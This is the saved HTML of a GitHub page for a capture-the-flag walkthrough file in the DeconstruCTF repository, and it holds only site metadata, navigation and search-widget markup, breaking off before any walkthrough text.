<meta name="viewport" content="width=device-width"> <title>DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF · GitHub</title> <meta name="description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta name="twitter:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta property="og:image:alt" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta property="og:url" content="https://github.com/deepakdhayal/DeconstruCTF" /><meta property="og:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B299:3914:A3467D:AE2D6E:61830689" data-pjax-transient="true"/><meta name="html-safe-nonce" content="ac5c89dc909c5e7b3bc218e7d2d23c9b3c5007d1d8ea73c9f64d55215eb19d63" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMjk5OjM5MTQ6QTM0NjdEOkFFMkQ2RTo2MTgzMDY4OSIsInZpc2l0b3JfaWQiOiI5MDEyNTk2MjE3NzkxODQxOTI5IiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fcmVuZGVyIjoiZnJhIn0=" data-pjax-transient="true"/><meta name="visitor-hmac" content="3b896fe95d71fb7e6d38c6afa718fc8882f96c4b1bb01cd7370109ae31d46670" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:412702904" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-pjax-transient="true" />
<meta name="optimizely-datafile" content="{"version": "4", "rollouts": [], "typedAudiences": [], "anonymizeIP": true, "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [{"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20438636352", "key": "control"}, {"variables": [], "id": "20484957397", "key": "treatment"}], "id": "20479227424", "key": "growth_ghec_onboarding_experience", "layerId": "20467848595", "trafficAllocation": [{"entityId": "20484957397", "endOfRange": 1000}, {"entityId": "20484957397", "endOfRange": 3000}, {"entityId": "20484957397", "endOfRange": 5000}, {"entityId": "20484957397", "endOfRange": 6000}, {"entityId": "20484957397", "endOfRange": 8000}, {"entityId": "20484957397", "endOfRange": 10000}], "forcedVariations": {"85e2238ce2b9074907d7a3d91d6feeae": "control"}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20619540113", "key": "control"}, {"variables": [], "id": "20598530123", "key": "treatment"}], "id": "20619150105", "key": "dynamic_seats", "layerId": "20615170077", "trafficAllocation": [{"entityId": "20598530123", "endOfRange": 5000}, {"entityId": "20619540113", "endOfRange": 10000}], "forcedVariations": {}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20667381018", "key": "control"}, {"variables": [], "id": "20680930759", "key": "treatment"}], "id": "20652570897", "key": "project_genesis", "layerId": "20672300363", "trafficAllocation": [{"entityId": "20667381018", "endOfRange": 5000}, {"entityId": "20667381018", "endOfRange": 10000}], "forcedVariations": {"83356e17066d336d1803024138ecb683": "treatment", "18e31c8a9b2271332466133162a4aa0d": "treatment", "10f8ab3fbc5ebe989a36a05f79d48f32": "treatment", "1686089f6d540cd2deeaec60ee43ecf7": "treatment"}}], "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "groups": [], "sdkKey": "WTc6awnGuYDdG98CYRban", "environmentKey": "production", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event.do_not_use_in_production"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": ["20479227424", "20619150105"], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": ["20479227424"], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": ["20479227424"], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": ["20479227424"], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": ["20479227424"], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": ["20479227424"], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": ["20479227424"], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": ["20652570897"], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": ["20479227424"], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": ["20619150105"], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": ["20619150105"], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": ["20619150105"], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": ["20479227424"], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": ["20479227424"], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": ["20652570897"], "id": "20795281201", "key": "click.archive_list"}], "revision": "968"}" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-NZtGC6blJ7XNT65diVllJBaNYNfq1AF6KQL75eFqN/RlMMwleYJ/a6KTgp7dEeO3Iy3PGM2h52TpyYawjCYqkg==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-359b460b.js"></script>
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/deepakdhayal/DeconstruCTF git https://github.com/deepakdhayal/DeconstruCTF.git">
<meta name="octolytics-dimension-user_id" content="48149717" /><meta name="octolytics-dimension-user_login" content="deepakdhayal" /><meta name="octolytics-dimension-repository_id" content="412702904" /><meta name="octolytics-dimension-repository_nwo" content="deepakdhayal/DeconstruCTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="412702904" /><meta name="octolytics-dimension-repository_network_root_nwo" content="deepakdhayal/DeconstruCTF" />
<link rel="canonical" href="https://github.com/deepakdhayal/DeconstruCTF/blob/Master/WalkThrough.md" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="412702904" data-scoped-search-url="/deepakdhayal/DeconstruCTF/search" data-owner-scoped-search-url="/users/deepakdhayal/search" data-unscoped-search-url="/search" action="/deepakdhayal/DeconstruCTF/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="rt4FujXXf+L689gmZK3YTs+CLJSIpXBByMM3/g1whIZP0CtcokppDEgxDT/5qTlLslwmsn+JvmSAcom97XZoMA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 